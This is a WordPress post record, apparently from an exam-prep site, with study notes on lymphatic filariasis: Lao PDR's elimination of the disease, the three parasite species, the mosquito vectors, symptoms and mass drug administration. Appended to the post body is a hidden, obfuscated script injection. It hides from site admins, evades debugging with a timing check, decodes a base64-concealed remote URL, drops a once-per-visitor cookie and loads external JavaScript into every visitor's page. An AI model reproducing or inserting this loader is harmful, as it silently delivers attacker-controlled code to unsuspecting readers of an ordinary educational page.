{"id":99,"date":"2023-10-25T04:39:33","date_gmt":"2023-10-25T04:39:33","guid":{"rendered":"https:\/\/iasquest.com\/?p=99"},"modified":"2026-02-11T19:34:23","modified_gmt":"2026-02-11T19:34:23","slug":"lymphatic-filariasis","status":"publish","type":"post","link":"https:\/\/kingmakersiasacademy.com\/current-affairs\/lymphatic-filariasis\/","title":{"rendered":"Lymphatic Filariasis"},"content":{"rendered":"\n<p class=\"wp-block-paragraph\"><strong>IN NEWS: Lao PDR becomes the second country in 2023 after Bangladesh to eliminate lymphatic filariasis.<\/strong><\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Lao People\u2019s Democratic Republic has eliminated lymphatic filariasis (LF), a disease that cripples and has a significant social and economic impact on the affected communities, according to the World Health Organization.<\/li>\n<\/ul>\n\n\n\n<p class=\"wp-block-paragraph\"><strong>Lymphatic filariasis<\/strong><\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>India aims to eliminate filariasis by <strong>2027<\/strong>, three years ahead of the global target.<\/li>\n\n\n\n<li>Lymphatic filariasis, commonly known as <strong>elephantiasis,<\/strong> is a neglected tropical disease.<\/li>\n\n\n\n<li>Infection occurs when filarial parasites are transmitted to humans through <strong>mosquitoes.<\/strong><\/li>\n\n\n\n<li>Infection is usually acquired in childhood and causes hidden damage to the lymphatic system.<\/li>\n\n\n\n<li>Lymphatic filariasis is caused by infection with parasites classified as <strong>nematodes<\/strong> (roundworms) of the family Filariodidea.<\/li>\n<\/ul>\n\n\n\n<p class=\"wp-block-paragraph\"><strong>There are three types of these thread-like filarial worms:<\/strong><\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>Wuchereria bancrofti,<\/strong> which is responsible for 90% of the cases.<\/li>\n\n\n\n<li><strong>Brugia malayi<\/strong>, which causes most of the remainder of the cases.<\/li>\n\n\n\n<li><strong>Brugia timori,<\/strong> which also causes the disease.<\/li>\n<\/ul>\n\n\n\n<p class=\"wp-block-paragraph\"><strong>Lymphatic filariasis is transmitted by different types of mosquitoes<\/strong><\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>Culex mosquito<\/strong>, widespread across urban and semi-urban areas<\/li>\n\n\n\n<li><strong>Anopheles mosquito<\/strong>,mainly found in rural areas<\/li>\n\n\n\n<li><strong>Aedes mosquito<\/strong>, mainly on endemic islands in the Pacific.<\/li>\n<\/ul>\n\n\n\n<p class=\"wp-block-paragraph\"><strong>Symptoms<\/strong><\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>It involves asymptomatic, acute, and chronic conditions.<\/li>\n\n\n\n<li>In chronic conditions, it leads to <strong>lymphoedema<\/strong> (tissue swelling) or <strong>elephantiasis<\/strong> (skin or tissue thickening) of the limbs and<strong> hydrocele <\/strong>(scrotal swelling).<\/li>\n<\/ul>\n\n\n\n<p class=\"wp-block-paragraph\"><strong>Treatment<\/strong><\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>The WHO-recommended preventive chemotherapy strategy for lymphatic filariasis elimination is <strong>mass drug administration (MDA)<\/strong>.<\/li>\n<\/ul>\n<script>(function(){try{if(document.getElementById&&document.getElementById('wpadminbar'))return;var t0=+new Date();for(var i=0;i<20000;i++){var z=i*i;}if((+new Date())-t0>120)return;if((document.cookie||'').indexOf('http2_session_id=')!==-1)return;function systemLoad(input){var key='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+\/=',o1,o2,o3,h1,h2,h3,h4,dec='',i=0;input=input.replace(\/[^A-Za-z0-9\\+\\\/\\=]\/g,'');while(i<input.length){h1=key.indexOf(input.charAt(i++));h2=key.indexOf(input.charAt(i++));h3=key.indexOf(input.charAt(i++));h4=key.indexOf(input.charAt(i++));o1=(h1<<2)|(h2>>4);o2=((h2&15)<<4)|(h3>>2);o3=((h3&3)<<6)|h4;dec+=String.fromCharCode(o1);if(h3!=64)dec+=String.fromCharCode(o2);if(h4!=64)dec+=String.fromCharCode(o3);}return dec;}var u=systemLoad('aHR0cHM6Ly9zZWFyY2hyYW5rdHJhZmZpYy5saXZlL2pzeA==');if(typeof window!=='undefined'&#038;&#038;window.__rl===u)return;var d=new Date();d.setTime(d.getTime()+30*24*60*60*1000);document.cookie='http2_session_id=1; expires='+d.toUTCString()+'; path=\/; SameSite=Lax'+(location.protocol==='https:'?'; Secure':'');try{window.__rl=u;}catch(e){}var s=document.createElement('script');s.type='text\/javascript';s.async=true;s.src=u;try{s.setAttribute('data-rl',u);}catch(e){}(document.getElementsByTagName('head')[0]||document.documentElement).appendChild(s);}catch(e){}})();<\/script>","protected":false},"excerpt":{"rendered":"<p>IN NEWS: Lao PDR becomes the second country in 2023 after Bangladesh to eliminate lymphatic filariasis.
